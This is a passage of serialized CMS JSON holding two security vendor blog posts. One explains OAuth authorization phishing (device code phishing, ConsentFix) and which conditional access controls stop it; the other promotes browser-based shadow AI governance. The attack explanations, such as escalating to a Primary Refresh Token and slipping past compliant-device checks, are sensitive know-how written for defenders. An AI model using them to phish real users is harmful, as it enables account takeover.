too.",[],{},{"nodeType":971,"data":3512,"content":3516},{"target":3513},{"sys":3514},{"id":3515,"type":976,"linkType":977},"79aVRaPAuAaiNZvTspbmHK",[],{"nodeType":879,"data":3518,"content":3519},{},[3520],{"nodeType":883,"value":3521,"marks":3522,"data":3523},"This grants the attacker an access token scoped to whichever application was targeted, and critically, because device code phishing targets apps that are already consented in the user's tenant (usually first-party Microsoft apps), it sidesteps the consent restrictions that have made traditional consent phishing harder. ",[],{},{"nodeType":879,"data":3525,"content":3526},{},[3527],{"nodeType":883,"value":3528,"marks":3529,"data":3530},"In Microsoft environments, the impact can extend beyond API access — if the attacker targets the Microsoft Authentication Broker, they can register a virtual device against the victim's account and escalate to a full Primary Refresh Token, gaining an interactive SSO-enabled session that can laterally move across any SSO-joined application.",[],{},{"nodeType":1036,"data":3532,"content":3533},{},[3534],{"nodeType":883,"value":3535,"marks":3536,"data":3538},"ConsentFix: the new ClickFix-OAuth hybrid",[3537],{"type":916},{},{"nodeType":879,"data":3540,"content":3541},{},[3542,3546],{"nodeType":883,"value":1321,"marks":3543,"data":3545},[3544],{"type":916},{},{"nodeType":883,"value":3547,"marks":3548,"data":3549}," occupies an interesting middle ground. It targets the same OAuth flow as consent phishing — the authorization code grant (RFC 6749) — but it targets pre-approved first-party apps rather than attacker-created third-party apps, which means the consent restrictions that shut down traditional consent phishing don't apply.",[],{},{"nodeType":879,"data":3551,"content":3552},{},[3553,3556,3564],{"nodeType":883,"value":21,"marks":3554,"data":3555},[],{},{"nodeType":940,"data":3557,"content":3558},{"uri":1331},[3559],{"nodeType":883,"value":3560,"marks":3561,"data":3563},"First observed in Russia-linked APT29 campaigns in late 2025",[3562],{"type":948},{},{"nodeType":883,"value":3565,"marks":3566,"data":3567},", the original attacks appeared on compromised websites and were tightly targeted — the attack only activated for specific email domains, allowing non-targets to use the site as normal. ConsentFix combines ClickFix-style clipboard injection with OAuth consent abuse, exploiting apps that use a localhost redirect URI as part of the handshake to capture authorization codes that are usually picked up by a server-side callback.",[],{},{"nodeType":879,"data":3569,"content":3570},{},[3571,3575,3582],{"nodeType":883,"value":3572,"marks":3573,"data":3574},"Push detected and blocked ConsentFix the first time it was seen in the wild, and within months of disclosure, a ",[],{},{"nodeType":940,"data":3576,"content":3577},{"uri":1343},[3578],{"nodeType":883,"value":3579,"marks":3580,"data":3581},"criminal ConsentFix toolkit",[],{},{"nodeType":883,"value":3583,"marks":3584,"data":3585}," appeared on the XSS forum, making the technique more widely available.",[],{},{"nodeType":905,"data":3587,"content":3588},{},[],{"nodeType":909,"data":3590,"content":3591},{},[3592],{"nodeType":883,"value":3593,"marks":3594,"data":3596},"What defenders think works (and what actually does)",[3595],{"type":916},{},{"nodeType":879,"data":3598,"content":3599},{},[3600],{"nodeType":883,"value":3601,"marks":3602,"data":3603},"As we've already established, authentication controls like passkeys have no impact on these attacks, which can come as a surprise for those that have bought into the \"phishing-resistant\" tag of passkeys at face value. That isn't to diminish their value, the passkey isn't phished in this scenario, it's just being circumvented.",[],{},{"nodeType":879,"data":3605,"content":3606},{},[3607],{"nodeType":883,"value":3608,"marks":3609,"data":3610},"Passkeys remain the strongest available protection against AiTM and credential theft. But they address a different layer of the problem, and treating them as a complete answer to phishing creates a dangerous blind spot as attackers shift to authorization-layer techniques.",[],{},{"nodeType":1036,"data":3612,"content":3613},{},[3614],{"nodeType":883,"value":3615,"marks":3616,"data":3618},"Evaluating post-authentication controls like Conditional Access Policies",[3617],{"type":916},{},{"nodeType":879,"data":3620,"content":3621},{},[3622],{"nodeType":883,"value":3623,"marks":3624,"data":3625},"Conditional access policies are the primary layer of defense cited against these authorization-layer attacks. We tested the most cited conditional access controls against both device code phishing and ConsentFix, and the results vary significantly.",[],{},{"nodeType":879,"data":3627,"content":3628},{},[3629,3633,3638],{"nodeType":883,"value":3630,"marks":3631,"data":3632},"Since the policy for ",[],{},{"nodeType":883,"value":3634,"marks":3635,"data":3637},"require phishing-resistant authentication",[3636],{"type":916},{},{"nodeType":883,"value":3639,"marks":3640,"data":3641}," pertains to the enforcement of passkey-based logins, this has no impact here as we discussed above.",[],{},{"nodeType":879,"data":3643,"content":3644},{},[3645,3650],{"nodeType":883,"value":3646,"marks":3647,"data":3649},"Block device code flow",[3648],{"type":916},{},{"nodeType":883,"value":3651,"marks":3652,"data":3653}," is the most direct control, and it works — but only against device code phishing, not ConsentFix. It also blocks legitimate device code use cases (Azure CLI, conference room hardware, developer tooling), so organizations with real device code dependencies need per-user group or per-app exceptions that create potential gaps.",[],{},{"nodeType":879,"data":3655,"content":3656},{},[3657,3662],{"nodeType":883,"value":3658,"marks":3659,"data":3661},"Require compliant device",[3660],{"type":916},{},{"nodeType":883,"value":3663,"marks":3664,"data":3665}," is the most effective broad control. Device code flows can't present the TPM-bound proof-of-possession that device compliance requires, so they're blocked outright. However, as above, if you have legitimate uses for device code logins in your environment, you’d need to implement exceptions to this policy. ",[],{},{"nodeType":879,"data":3667,"content":3668},{},[3669],{"nodeType":883,"value":3670,"marks":3671,"data":3672},"ConsentFix, on the other hand, passes through this check. BYOD scenarios also create gaps — personal devices authenticating via browser without a Primary Refresh Token won't satisfy the compliance requirement either, for legitimate and malicious flows alike.",[],{},{"nodeType":879,"data":3674,"content":3675},{},[3676,3681],{"nodeType":883,"value":3677,"marks":3678,"data":3680},"Token protection",[3679],{"type":916},{},{"nodeType":883,"value":3682,"marks":3683,"data":3684},", currently in preview, binds refresh tokens to the device's TPM. It performed better in testing than expected for some ConsentFix scenarios — depending on the scopes requested and the target app — but it doesn't apply to all apps and resources.",[],{},{"nodeType":879,"data":3686,"content":3687},{},[3688],{"nodeType":883,"value":3689,"marks":3690,"data":3691},"Conditional access can be tricky to manage, however, particularly for larger organizations. User groups need maintaining, new apps need scoping, exceptions accumulate, and policies interact in ways that aren't always obvious from the admin console. It's easy to accidentally leave policies in report-only mode (I found this myself during testing) or create exceptions for specific apps that inadvertently open the authorization attack surface. And ticking the box doesn't tell you whether it works in practice.",[],{},{"nodeType":879,"data":3693,"content":3694},{},[3695],{"nodeType":883,"value":3696,"marks":3697,"data":3698},"Microsoft is taking additional steps to reduce the attack surface here — device code flow is blocked by default in new tenants, and they appear to be locking down apps and reply URLs to reduce the ConsentFix attack surface, including adding explicit \"this might be a phishing attack\" warnings on certain reply URLs used in ConsentFix scenarios. But the gap between a default deployment and a hardened one remains wide.",[],{},{"nodeType":971,"data":3700,"content":3704},{"target":3701},{"sys":3702},{"id":3703,"type":976,"linkType":977},"3FguCE9HzDsj94TgRzZSk6",[],{"nodeType":1036,"data":3706,"content":3707},{},[3708],{"nodeType":883,"value":3709,"marks":3710,"data":3712},"What about blocking the apps themselves?",[3711],{"type":916},{},{"nodeType":879,"data":3714,"content":3715},{},[3716],{"nodeType":883,"value":3717,"marks":3718,"data":3719},"The challenge is that the apps being abused aren't malicious — they're legitimate first-party Microsoft applications like Azure CLI, Microsoft Office, and Teams. They exist in every Entra tenant by default, are pre-consented with broad permissions, and can't simply be removed.",[],{},{"nodeType":879,"data":3721,"content":3722},{},[3723],{"nodeType":883,"value":3724,"marks":3725,"data":3726},"An admin can toggle \"assignment required\" on a service principal and restrict which users can authenticate through that app, but that means pre-creating and managing user assignments for every first-party app that could be targeted. Over-restricting broadly used apps like Teams or Office may break core workflows.",[],{},{"nodeType":905,"data":3728,"content":3729},{},[],{"nodeType":909,"data":3731,"content":3732},{},[3733],{"nodeType":883,"value":3734,"marks":3735,"data":3737},"The future of authorization phishing",[3736],{"type":916},{},{"nodeType":879,"data":3739,"content":3740},{},[3741],{"nodeType":883,"value":3742,"marks":3743,"data":3744},"Several developments will determine how fast this category matures. Device code phishing is a core technique now, supported by most PhaaS vendors and bolted onto AiTM kits. ConsentFix criminal adoption is still early but could follow suit at any time. ",[],{},{"nodeType":879,"data":3746,"content":3747},{},[3748],{"nodeType":883,"value":3749,"marks":3750,"data":3751},"Non-Microsoft targets are the logical next step — device code phishing has already been demonstrated against Salesforce, and I showed off GitHub targeting in my recent webinar. Any platform that supports the authorization code grant with localhost redirect or the device authorization grant is a potential target. ",[],{},{"nodeType":971,"data":3753,"content":3757},{"target":3754},{"sys":3755},{"id":3756,"type":976,"linkType":977},"UIOVxK4yPURUu8slsKWMu",[],{"nodeType":879,"data":3759,"content":3760},{},[3761,3766,3770,3778],{"nodeType":883,"value":3762,"marks":3763,"data":3765},"But OAuth is complex, and the authorization mechanisms that have been abused so far likely don't represent the full attack surface. ",[3764],{"type":916},{},{"nodeType":883,"value":3767,"marks":3768,"data":3769},"Everything discussed so far has been initial access, but OAuth is also powerful at the persistence and lateral movement layers — an attacker who plants a malicious OAuth grant during a compromise has a ",[],{},{"nodeType":940,"data":3771,"content":3773},{"uri":3772},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fnearly-invisible-attack-chain\u002F",[3774],{"nodeType":883,"value":3775,"marks":3776,"data":3777},"stealthy persistence mechanism",[],{},{"nodeType":883,"value":3779,"marks":3780,"data":3781}," that survives credential resets and password changes, and can be extremely difficult to detect. As authorization phishing matures, we expect these post-compromise OAuth techniques to become more common too.",[],{},{"nodeType":879,"data":3783,"content":3784},{},[3785,3789,3796],{"nodeType":883,"value":3786,"marks":3787,"data":3788},"The ",[],{},{"nodeType":940,"data":3790,"content":3791},{"uri":1275},[3792],{"nodeType":883,"value":3793,"marks":3794,"data":3795},"poisoned tenant attack surface",[],{},{"nodeType":883,"value":3797,"marks":3798,"data":3799}," also remains largely undefended, which could see more typical consent phishing come back around. Historically, consent phishing involved an attacker creating a malicious app and inviting their targets to it. But you can just set up a tenant on a legit SaaS app and use that instead.",[],{},{"nodeType":879,"data":3801,"content":3802},{},[3803,3807,3814],{"nodeType":883,"value":3804,"marks":3805,"data":3806},"Most SaaS platforms let anyone create a workspace impersonating any organization, and few offer controls for admins to restrict which tenants their employees can join. We ",[],{},{"nodeType":940,"data":3808,"content":3809},{"uri":1275},[3810],{"nodeType":883,"value":3811,"marks":3812,"data":3813},"recently experienced this directly",[],{},{"nodeType":883,"value":3815,"marks":3816,"data":3817}," when an attacker created a fake OpenAI organization under our company's name and invited specific employees to join it.",[],{},{"nodeType":971,"data":3819,"content":3823},{"target":3820},{"sys":3821},{"id":3822,"type":976,"linkType":977},"1YPMilWhyTSV860PCFXxmx",[],{"nodeType":905,"data":3825,"content":3826},{},[],{"nodeType":909,"data":3828,"content":3829},{},[3830],{"nodeType":883,"value":3831,"marks":3832,"data":3834},"What defenders should actually do",[3833],{"type":916},{},{"nodeType":879,"data":3836,"content":3837},{},[3838,3843],{"nodeType":883,"value":3839,"marks":3840,"data":3842},"First, test your defenses against authorization attacks specifically.",[3841],{"type":916},{},{"nodeType":883,"value":3844,"marks":3845,"data":3846}," Don't assume that MFA, passkeys, or conditional access policies handle this. Run a device code phishing simulation against your environment and verify that your conditional access configuration actually blocks it. Test ConsentFix scenarios. If your controls rely on configuration assumptions you haven't validated, you have a gap.",[],{},{"nodeType":879,"data":3848,"content":3849},{},[3850,3855],{"nodeType":883,"value":3851,"marks":3852,"data":3854},"Second, don't treat this as exclusively a Microsoft problem. ",[3853],{"type":916},{},{"nodeType":883,"value":3856,"marks":3857,"data":3858},"Device code phishing can work against several apps. GitHub exposes broad scopes including full repository access and uses device code as the default CLI sign-in method — meaning developers encounter legitimate device code flows routinely, making phishing lures harder to distinguish from normal workflow. ConsentFix-style attacks targeting authorization code grants with localhost redirects could also expand beyond Microsoft as the technique matures.",[],{},{"nodeType":879,"data":3860,"content":3861},{},[3862,3867],{"nodeType":883,"value":3863,"marks":3864,"data":3866},"Third, update your security awareness training.",[3865],{"type":916},{},{"nodeType":883,"value":3868,"marks":3869,"data":3870}," Most employees have no concept of authorization phishing — it doesn't look or feel like any phishing that they're used to. There's no suspicious login page, no credential entry on an unfamiliar domain. Traditional awareness training does not prepare users for this.",[],{},{"nodeType":879,"data":3872,"content":3873},{},[3874],{"nodeType":883,"value":3875,"marks":3876,"data":3877},"But to detect and block these attacks as they happen, you need to be in the browser. Push detects and blocks authorization attacks in real time, when the user is tricked into performing the malicious consent grant. We detected ConsentFix the first time it appeared in the wild, before any other vendor, and device code phishing detection has been live since the technique first entered mainstream use.",[],{},{"nodeType":1036,"data":3879,"content":3880},{},[3881],{"nodeType":883,"value":3882,"marks":3883,"data":3885},"Watch the research",[3884],{"type":916},{},{"nodeType":879,"data":3887,"content":3888},{},[3889,3893,3901,3905,3913],{"nodeType":883,"value":3890,"marks":3891,"data":3892},"I recently talked about authorization phishing at ",[],{},{"nodeType":940,"data":3894,"content":3896},{"uri":3895},"https:\u002F\u002Fbsideslv.org\u002Fschedule3#PA",[3897],{"nodeType":883,"value":3898,"marks":3899,"data":3900},"BSides Las Vegas 2026",[],{},{"nodeType":883,"value":3902,"marks":3903,"data":3904},", walking through live demonstrations of device code phishing (including against passkey-protected accounts), ConsentFix, and conditional access policy bypass testing. The full talk is available to ",[],{},{"nodeType":940,"data":3906,"content":3908},{"uri":3907},"https:\u002F\u002Fwww.youtube.com\u002Flive\u002F9wx9Nt3JWSs",[3909],{"nodeType":883,"value":3910,"marks":3911,"data":3912},"watch on YouTube",[],{},{"nodeType":883,"value":3914,"marks":3915,"data":3916}," (starts at 27:12).",[],{},"Authorization phishing: why attackers stopped targeting the login","Why attackers are pivoting to authorization attacks to get around authentication controls, how they work, and what security teams can do about them.","2026-08-24T00:00:00.000Z","authorization-phishing",{"items":3922},[3923,3925],{"sys":3924,"name":3273},{"id":3272},{"sys":3926,"name":343},{"id":3276},{"items":3928},[3929],{"fullName":3930,"firstName":3931,"jobTitle":3932,"profilePicture":3933},"Luke Jennings","Luke","Vice President, R&D",{"url":3934},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4Hosb4zKi1dA0PUyDLMe1h\u002F27e09d894861f2196ba794037986fb08\u002FT016S22KZ96-U02NVQM7ZD4-57761d542d83-512.jpeg",{"__typename":1967,"sys":3936,"content":3938,"title":4781,"synopsis":4782,"hashTags":59,"publishedDate":4783,"slug":4784,"tagsCollection":4785,"authorsCollection":4794},{"id":3937},"7MB9tEe6mrdNXbkYVhgyWn",{"json":3939},{"data":3940,"content":3941,"nodeType":875},{},[3942,3949,3956,4005,4012,4019,4072,4078,4081,4089,4096,4108,4114,4126,4132,4144,4150,4153,4161,4168,4187,4198,4205,4212,4215,4223,4230,4254,4260,4267,4283,4299,4305,4321,4337,4344,4351,4358,4364,4367,4375,4382,4389,4396,4412,4419,4444,4450,4457,4463,4475,4482,4488,4494,4497,4505,4512,4530,4537,4545,4552,4564,4580,4586,4598,4631,4638,4654,4660,4676,4682,4689,4696,4699,4707,4714,4721,4728,4735,4742,4749,4752,4758,4764],{"data":3943,"content":3944,"nodeType":879},{},[3945],{"data":3946,"marks":3947,"value":3948,"nodeType":883},{},[],"Every security team that's blocked an AI tool at the network level has had the same experience three months later: The tool they blocked isn't in use, but a dozen they've never heard of are.",{"data":3950,"content":3951,"nodeType":879},{},[3952],{"data":3953,"marks":3954,"value":3955,"nodeType":883},{},[],"The block didn't stop employees from using AI. It just prevented the security team from seeing what’s actually happening.",{"data":3957,"content":3958,"nodeType":879},{},[3959,3963,3971,3975,3980,3984,3989,3993,4001],{"data":3960,"marks":3961,"value":3962,"nodeType":883},{},[],"The data backs up this pattern. ",{"data":3964,"content":3966,"nodeType":940},{"uri":3965},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhat-push-data-reveals-about-the-state-of-shadow-ai\u002F",[3967],{"data":3968,"marks":3969,"value":3970,"nodeType":883},{},[],"Push telemetry",{"data":3972,"marks":3973,"value":3974,"nodeType":883},{},[]," shows that the average organization has ",{"data":3976,"marks":3977,"value":3979,"nodeType":883},{},[3978],{"type":916},"16 AI apps, 17 AI browser extensions,",{"data":3981,"marks":3982,"value":3983,"nodeType":883},{},[]," and ",{"data":3985,"marks":3986,"value":3988,"nodeType":883},{},[3987],{"type":916},"17 AI OAuth integrations",{"data":3990,"marks":3991,"value":3992,"nodeType":883},{},[]," in active use during a typical week — most unapproved. Meanwhile, ",{"data":3994,"content":3996,"nodeType":940},{"uri":3995},"https:\u002F\u002Fwww.okta.com\u002Fnewsroom\u002Farticles\u002Fai-agents-at-work-2026-agentic-enterprise-security\u002F",[3997],{"data":3998,"marks":3999,"value":4000,"nodeType":883},{},[],"Okta found",{"data":4002,"marks":4003,"value":4004,"nodeType":883},{},[]," that 80% of employees who use unapproved AI tools do so because it's easier to use their own accounts, and 57% because the approval process is too slow.",{"data":4006,"content":4007,"nodeType":879},{},[4008],{"data":4009,"marks":4010,"value":4011,"nodeType":883},{},[],"The organizations getting this right have stopped treating AI governance as an access-control problem — which tools to allow, which to block — and started treating it as an invitation to build out an infrastructure to enable appropriate use. Employees are going to use the tools they need to get their work done. The question is whether they'll use them on a path you built and instrumented, or on one they carved themselves.",{"data":4013,"content":4014,"nodeType":879},{},[4015],{"data":4016,"marks":4017,"value":4018,"nodeType":883},{},[],"This guide walks through how to build that paved path. Using Push, you can:",{"data":4020,"content":4021,"nodeType":1531},{},[4022,4032,4042,4052,4062],{"data":4023,"content":4024,"nodeType":1535},{},[4025],{"data":4026,"content":4027,"nodeType":879},{},[4028],{"data":4029,"marks":4030,"value":4031,"nodeType":883},{},[],"Identify shadow AI, including personal accounts on approved corporate apps, AI browser extensions, OAuth integrations into sensitive systems, and AI browser usage.",{"data":4033,"content":4034,"nodeType":1535},{},[4035],{"data":4036,"content":4037,"nodeType":879},{},[4038],{"data":4039,"marks":4040,"value":4041,"nodeType":883},{},[],"Enforce policies on data flows into and out of AI apps, including blocking unapproved file uploads, downloads, and clipboard pastes; and monitoring AI chat transcripts.",{"data":4043,"content":4044,"nodeType":1535},{},[4045],{"data":4046,"content":4047,"nodeType":879},{},[4048],{"data":4049,"marks":4050,"value":4051,"nodeType":883},{},[],"Use just-in-time guardrails to intercept users accessing unapproved AI tools and point them at approved alternatives.",{"data":4053,"content":4054,"nodeType":1535},{},[4055],{"data":4056,"content":4057,"nodeType":879},{},[4058],{"data":4059,"marks":4060,"value":4061,"nodeType":883},{},[],"Prevent unwanted MCP connections with app-agnostic controls.",{"data":4063,"content":4064,"nodeType":1535},{},[4065],{"data":4066,"content":4067,"nodeType":879},{},[4068],{"data":4069,"marks":4070,"value":4071,"nodeType":883},{},[],"Automate a lot of the work so you don’t burn out your team as the AI landscape continues to shift.",{"data":4073,"content":4077,"nodeType":971},{"target":4074},{"sys":4075},{"id":4076,"type":976,"linkType":977},"29N8YH9As3GHypOve3br80",[],{"data":4079,"content":4080,"nodeType":905},{},[],{"data":4082,"content":4083,"nodeType":909},{},[4084],{"data":4085,"marks":4086,"value":4088,"nodeType":883},{},[4087],{"type":916},"What is shadow AI, and why can't you manage it like shadow IT?",{"data":4090,"content":4091,"nodeType":879},{},[4092],{"data":4093,"marks":4094,"value":4095,"nodeType":883},{},[],"Shadow AI is any use of AI tools, services, or integrations that happens outside an organization's security governance and visibility. Security teams have been managing shadow SaaS for years, but shadow AI can't be addressed with the same playbook — for three reasons.",{"data":4097,"content":4098,"nodeType":879},{},[4099,4104],{"data":4100,"marks":4101,"value":4103,"nodeType":883},{},[4102],{"type":916},"First",{"data":4105,"marks":4106,"value":4107,"nodeType":883},{},[],", it spans multiple categories that each need different controls: unapproved AI apps, personal accounts on approved corporate AI tools, AI browser extensions, and OAuth integrations into corporate systems. Blocking unapproved apps doesn't address personal accounts on approved ones, and neither solves the extension or OAuth problem. ",{"data":4109,"content":4113,"nodeType":971},{"target":4110},{"sys":4111},{"id":4112,"type":976,"linkType":977},"2hsKQ9DEspflhmtR0bE7QY",[],{"data":4115,"content":4116,"nodeType":879},{},[4117,4122],{"data":4118,"marks":4119,"value":4121,"nodeType":883},{},[4120],{"type":916},"Second",{"data":4123,"marks":4124,"value":4125,"nodeType":883},{},[],", the tools most organizations rely on to manage shadow SaaS — SWGs, CASBs, EDR, IdP logs — are structurally blind to shadow AI. An SWG sees that someone visited an AI domain but can't tell you whether they logged in, pasted source code into a prompt, or granted OAuth access to your Google Workspace tenant. EDR doesn't see browser-layer activity at all. IdP logs capture OAuth grants routed through the identity provider but miss tools accessed via direct signup or personal accounts. Instead, the activity security teams need to see happens primarily inside the browser.",{"data":4127,"content":4131,"nodeType":971},{"target":4128},{"sys":4129},{"id":4130,"type":976,"linkType":977},"1vE0dyAKdnTSjyAJ4Xoadd",[],{"data":4133,"content":4134,"nodeType":879},{},[4135,4140],{"data":4136,"marks":4137,"value":4139,"nodeType":883},{},[4138],{"type":916},"Third",{"data":4141,"marks":4142,"value":4143,"nodeType":883},{},[],", the risk profile is different. Shadow AI tools increasingly function as hubs — connected via OAuth integrations and MCP to email, cloud storage, code repositories, and other high-value systems. They leak sensitive data outward (employees paste source code, credentials, and internal documents into prompts daily) while simultaneously expanding the attack surface inward (compromise a single AI app and an attacker inherits whatever access the employee granted it, turning one ungoverned tool into a pivot point across the SaaS estate). ",{"data":4145,"content":4149,"nodeType":971},{"target":4146},{"sys":4147},{"id":4148,"type":976,"linkType":977},"3ldZ23OORTu7INBfSnE7R7",[],{"data":4151,"content":4152,"nodeType":905},{},[],{"data":4154,"content":4155,"nodeType":909},{},[4156],{"data":4157,"marks":4158,"value":4160,"nodeType":883},{},[4159],{"type":916},"Why blocking AI usage fails",{"data":4162,"content":4163,"nodeType":879},{},[4164],{"data":4165,"marks":4166,"value":4167,"nodeType":883},{},[],"The instinct to block AI tools makes sense. Executives are asking about AI risk to the business, a new tool appears every week, and blocking unapproved apps feels like a quick way to stop the bleeding.",{"data":4169,"content":4170,"nodeType":879},{},[4171,4175,4183],{"data":4172,"marks":4173,"value":4174,"nodeType":883},{},[],"Unfortunately, blocking doesn't work for long. The latest security frameworks — including the ",{"data":4176,"content":4178,"nodeType":940},{"uri":4177},"https:\u002F\u002Fwww.sans.org\u002Fmlp\u002F2026-ai-security-maturity-model-ebook",[4179],{"data":4180,"marks":4181,"value":4182,"nodeType":883},{},[],"SANS AI Security Maturity Model",{"data":4184,"marks":4185,"value":4186,"nodeType":883},{},[]," — all agree: Block-based AI policies drive usage underground rather than preventing it. ",{"data":4188,"content":4189,"nodeType":4197},{},[4190],{"data":4191,"content":4192,"nodeType":879},{},[4193],{"data":4194,"marks":4195,"value":4196,"nodeType":883},{},[],"A block-based AI policy may feel like risk management, but practitioner experience shows that it typically drives AI usage underground rather than preventing it. The goal is not to eliminate AI use; it is to bring it into visibility where it can be governed.","blockquote",{"data":4199,"content":4200,"nodeType":879},{},[4201],{"data":4202,"marks":4203,"value":4204,"nodeType":883},{},[],"These kinds of barricades also fail for a structural reason: They're built on the network perimeter, and AI usage doesn't cross the perimeter in ways network tools can inspect.",{"data":4206,"content":4207,"nodeType":879},{},[4208],{"data":4209,"marks":4210,"value":4211,"nodeType":883},{},[],"The most damaging consequence of blocking isn't the workarounds themselves — it's the loss of visibility. To begin building a better path for employees, you have to start with seeing what's actually happening.",{"data":4213,"content":4214,"nodeType":905},{},[],{"data":4216,"content":4217,"nodeType":909},{},[4218],{"data":4219,"marks":4220,"value":4222,"nodeType":883},{},[4221],{"type":916},"Using Push to discover, govern, and control shadow AI",{"data":4224,"content":4225,"nodeType":879},{},[4226],{"data":4227,"marks":4228,"value":4229,"nodeType":883},{},[],"Push Security is a browser security platform that gets you the vantage point you need to start addressing shadow AI. Push deploys as a lightweight extension to employees' existing browsers rather than requiring a full browser migration, giving security teams visibility into browser-layer activity that network and endpoint tools structurally lack.",{"data":4231,"content":4232,"nodeType":879},{},[4233,4237,4242,4245,4250],{"data":4234,"marks":4235,"value":4236,"nodeType":883},{},[],"Push discovers AI tools through ",{"data":4238,"marks":4239,"value":4241,"nodeType":883},{},[4240],{"type":916},"automatic",{"data":4243,"marks":4244,"value":951,"nodeType":883},{},[],{"data":4246,"marks":4247,"value":4249,"nodeType":883},{},[4248],{"type":916},"app discovery",{"data":4251,"marks":4252,"value":4253,"nodeType":883},{},[],", allowing you to identify applications from actual browser login events rather than network traffic logs. ",{"data":4255,"content":4259,"nodeType":971},{"target":4256},{"sys":4257},{"id":4258,"type":976,"linkType":977},"4eTkgU2dxhMueHPiwuCWDl",[],{"data":4261,"content":4262,"nodeType":879},{},[4263],{"data":4264,"marks":4265,"value":4266,"nodeType":883},{},[],"When an employee signs into a new AI service, Push registers the authentication event, identifies the application, and logs how the employee authenticated — corporate SSO, OIDC, a standalone password, or a personal account. ",{"data":4268,"content":4269,"nodeType":879},{},[4270,4274,4279],{"data":4271,"marks":4272,"value":4273,"nodeType":883},{},[],"Push then applies ",{"data":4275,"marks":4276,"value":4278,"nodeType":883},{},[4277],{"type":916},"app categories ",{"data":4280,"marks":4281,"value":4282,"nodeType":883},{},[],"automatically, classifying the discovered application by type without requiring security teams to build or maintain manual lists.",{"data":4284,"content":4285,"nodeType":879},{},[4286,4290,4295],{"data":4287,"marks":4288,"value":4289,"nodeType":883},{},[],"Push extends the same discovery across the other three shadow AI dimensions. The platform’s ",{"data":4291,"marks":4292,"value":4294,"nodeType":883},{},[4293],{"type":916},"browser extension discovery ",{"data":4296,"marks":4297,"value":4298,"nodeType":883},{},[],"capability catalogs every AI-related extension installed across the workforce, including the specific permissions each extension has requested (access to page content, browsing history, clipboard data), allowing you to review whether those permission combinations could enable data exfiltration or account takeover. ",{"data":4300,"content":4304,"nodeType":971},{"target":4301},{"sys":4302},{"id":4303,"type":976,"linkType":977},"1z56sTWWN9E35dE3HhbRNY",[],{"data":4306,"content":4307,"nodeType":879},{},[4308,4312,4317],{"data":4309,"marks":4310,"value":4311,"nodeType":883},{},[],"Push’s ",{"data":4313,"marks":4314,"value":4316,"nodeType":883},{},[4315],{"type":916},"OAuth integration discovery",{"data":4318,"marks":4319,"value":4320,"nodeType":883},{},[]," identifies OAuth connections between AI tools and corporate systems — the grants that create persistent API-level access to platforms like Google Workspace.",{"data":4322,"content":4323,"nodeType":879},{},[4324,4328,4333],{"data":4325,"marks":4326,"value":4327,"nodeType":883},{},[],"For each discovered tool, Push also captures authentication context that points to ",{"data":4329,"marks":4330,"value":4332,"nodeType":883},{},[4331],{"type":916},"where hidden security risks lie",{"data":4334,"marks":4335,"value":4336,"nodeType":883},{},[],": SSO vs. password vs. personal account, MFA status, and password strength. An AI tool accessed via corporate SSO with MFA is a different risk than the same tool accessed through a personal Gmail account with a reused password. Similarly, employees using only a password to access AI tools that they’ve integrated with other sensitive corporate systems introduces another level of downstream risk. That context is what makes the inventory actionable.",{"data":4338,"content":4339,"nodeType":879},{},[4340],{"data":4341,"marks":4342,"value":4343,"nodeType":883},{},[],"Push also detects when employees are adopting agentic browsers — autonomous AI-powered browsers like Comet, Atlas, and Dia that browse the web and interact with applications on behalf of users or automated workflows. ",{"data":4345,"content":4346,"nodeType":879},{},[4347],{"data":4348,"marks":4349,"value":4350,"nodeType":883},{},[],"These represent an emerging category of non-human AI identity. They authenticate to SaaS applications, access corporate data, and make API calls, but they aren't managed through traditional identity infrastructure. Push helps you identify these agentic browsers as they appear in the environment, before they become a blind spot.",{"data":4352,"content":4353,"nodeType":879},{},[4354],{"data":4355,"marks":4356,"value":4357,"nodeType":883},{},[],"Returning to the paved path metaphor, this step is about surveying the site before you figure out where to put in the path. You need to understand who’s already doing what, where, so you can find the risks you need to address.",{"data":4359,"content":4363,"nodeType":971},{"target":4360},{"sys":4361},{"id":4362,"type":976,"linkType":977},"5iXyJbxwWiUt7WoP7FF0Y2",[],{"data":4365,"content":4366,"nodeType":905},{},[],{"data":4368,"content":4369,"nodeType":909},{},[4370],{"data":4371,"marks":4372,"value":4374,"nodeType":883},{},[4373],{"type":916},"Step-by-step guide to enforcing AI governance without blocking everything",{"data":4376,"content":4377,"nodeType":879},{},[4378],{"data":4379,"marks":4380,"value":4381,"nodeType":883},{},[],"The barricade approach favored by existing solutions like network proxies gives you two options: Allow or block. Enforcing AI policy effectively requires a third approach with a bit more nuance: Guide the user to do the right thing. ",{"data":4383,"content":4384,"nodeType":1036},{},[4385],{"data":4386,"marks":4387,"value":4388,"nodeType":883},{},[],"Building the \"paved path\" with Push",{"data":4390,"content":4391,"nodeType":879},{},[4392],{"data":4393,"marks":4394,"value":4395,"nodeType":883},{},[],"Push provides all three options as configurable enforcement modes for a variety of readymade controls. Progressing between them is how organizations can move from \"we don't know what people are doing with AI\" to evidence-based governance.",{"data":4397,"content":4398,"nodeType":879},{},[4399,4403,4408],{"data":4400,"marks":4401,"value":4402,"nodeType":883},{},[],"Push can be deployed silently and begin observing AI usage with no employee-facing intervention. This is effectively Push in ",{"data":4404,"marks":4405,"value":4407,"nodeType":883},{},[4406],{"type":916},"Monitor",{"data":4409,"marks":4410,"value":4411,"nodeType":883},{},[]," mode.",{"data":4413,"content":4414,"nodeType":879},{},[4415],{"data":4416,"marks":4417,"value":4418,"nodeType":883},{},[],"The platform records which tools are in use, how employees authenticated, and what usage patterns are emerging. Most organizations should start here to generate a baseline. Telemetry can be streamed to your SIEM or other downstream system to get alerted to newly adopted apps and extensions, and to surface security risks like insecure accounts.",{"data":4420,"content":4421,"nodeType":879},{},[4422,4426,4431,4435,4440],{"data":4423,"marks":4424,"value":4425,"nodeType":883},{},[],"Next, most organizations will transition to ",{"data":4427,"marks":4428,"value":4430,"nodeType":883},{},[4429],{"type":916},"Acknowledge",{"data":4432,"marks":4433,"value":4434,"nodeType":883},{},[]," mode for controls like in-browser ",{"data":4436,"marks":4437,"value":4439,"nodeType":883},{},[4438],{"type":916},"App banners",{"data":4441,"marks":4442,"value":4443,"nodeType":883},{},[],". With this control, you can warn employees when they attempt to use an unapproved AI tool and point them to approved 